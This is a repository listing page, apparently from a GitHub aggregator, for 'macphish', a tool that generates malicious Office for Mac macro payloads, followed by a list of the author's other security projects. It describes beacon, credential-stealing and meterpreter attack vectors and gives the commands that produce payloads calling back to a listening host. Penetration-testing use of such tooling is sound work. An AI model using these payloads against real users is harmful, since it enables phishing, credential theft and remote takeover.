cldrn/macphish

Stars
233
Rank 172,230 (Top 4 %)
Language
Python
License
MIT License
Created almost 8 years ago
Updated about 7 years ago

cldrn/macphish

cldrn

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Office for Mac Macro Payload Generator

macphish

Office for Mac Macro Payload Generator

Attack vectors

There are 4 attack vectors available:

beacon
creds
meterpreter
meterpreter-grant

For the 'creds' method, macphish can generate the Applescript script directly, in case you need to run it from a shell.

beacon

On execution, this payload will signal our listening host and provide basic system information about the victim. The simplest way of generating a beacon payload is:

$./macphish.py -lh <listening host>

By default, it uses curl but other utilities (wget, nslookup) can be used by modifying the command template.

creds

$./macphish.py -lh <listening host> -lp <listening port> -a creds

meterpreter

The simplest way of generating a meterpreter payload is:

$./macphish.py -lh <listening host> -lp <listening port> -p <payload> -a meterpreter

meterpreter-grant

The generate a meterpreter payload that calls GrantAccessToMultipleFiles() first:

$./macphish.py -lh <listening host> -lp <listening port> -p <payload> -a meterpreter-grant

For meterpreter attacks, only python payloads are supported at the moment.

Usage

See https://github.com/cldrn/macphish/wiki/Usage

PoCs

nmap-nse-scripts

My collection of nmap NSE scripts

rainmap-lite

Rainmap Lite - Responsive web based interface that allows users to launch Nmap scans from their mobiles/tablets/web browsers!

InsecureProgrammingDB

Insecure programming functions database

davtest

davtest (improved)- Exploits WebDAV folders

codeql-queries

My CodeQL queries collection

external-nse-script-library

External NSE script library (Collection of unofficial scripts) - Feel free to submit your NSE scripts!

dnmap

Fork of Dnmap (http://dnmap.sourceforge.net/)

pentesting

Misc resources for my daily pentesting...

mac2wepkey-scanner

huawei mac2wepkey scanner

cakephpids

PHPIDS plugin implementation for CakePHP

cidrToIps

reads a list of IP ranges in CIDR notation and prints the individual IP addresses.

wardrive-analytics

Wardrive analytics: Generates a visual representation of your wardriving logs

metasploit-modules

My metasploit modules

security-advisories

My security advisories

url-collector-telegram

Bot that automatically stores URLs shared in Telegram chats/groups

8dot3-brute

8dot3-brute is a script to brute force Windows 8.3 filenames and directories in web servers

ocsp-preparation

My OSCP preparation toolkit/knowledge base

android-exploitation

Some PoCs of exploits for Android vulnerabilities

hmi-port-list

crowdstriked

Useful files when using Crowdstrike Real Time Response API

cakephpids-component

Component Implementation of PHPIDS for CakePHP

dotdotpwn

My unofficial/testing copy of dotdotpwn

ctf4-codeql-and-chill-java

My attempt solution for GitHub Security Lab CTF 4: CodeQL and Chill - The Java Edition

practical-iot-hacking

bcbus

BCBus - Android application for viewing BC Transit schedules in British Columbia

recaptcha-cakephp

reCaptcha implementation for CakePHP 1.3

polarisoffice-filemon

PoC of Android app that abuses a content provider with sensitive information and null read permissions to steal files listed in PolarisOffice's recent files tab

lgtm-test

lector-bunsen

Lector del comic Bunsen (http://heroeslocales.com/bunsen) para Android ( Basado en ComicViewer )

dcs

default credential scanner

enum4linux-0.9

enum4linux-0.9 Unofficial

sinfonier

Repositorio para concurso de sinfonier en cpmx5